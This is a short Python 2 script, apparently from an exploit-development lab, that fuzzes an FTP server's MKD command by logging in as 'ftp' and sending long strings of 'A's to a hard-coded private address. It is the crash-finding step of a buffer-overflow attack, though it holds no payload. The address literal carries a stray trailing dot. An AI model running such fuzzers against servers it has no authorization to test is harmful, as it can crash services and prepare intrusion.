import socket
import sys

buffer=["A"]
counter=256
#while len(buffer) <= 256:
buffer.append("A"*counter)
#	counter=counter+100

commands=["MKD"]
print "Accepting your given commands"
for command in commands:
	for string in buffer:
		print "Fuzzing " + command + " with length:" +str(len(string))
		s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		connect=s.connect(('10.61.185.208.',21))
		s.recv(1024)
		s.send('USER ftp\r\n')
		s.recv(1024)
		s.send('PASS ftp\r\n')
		s.recv(1024)
		s.send(command + ' ' + string + '\r\n')
		s.recv(1024)
		s.send('QUIT\r\n')
		s.close()
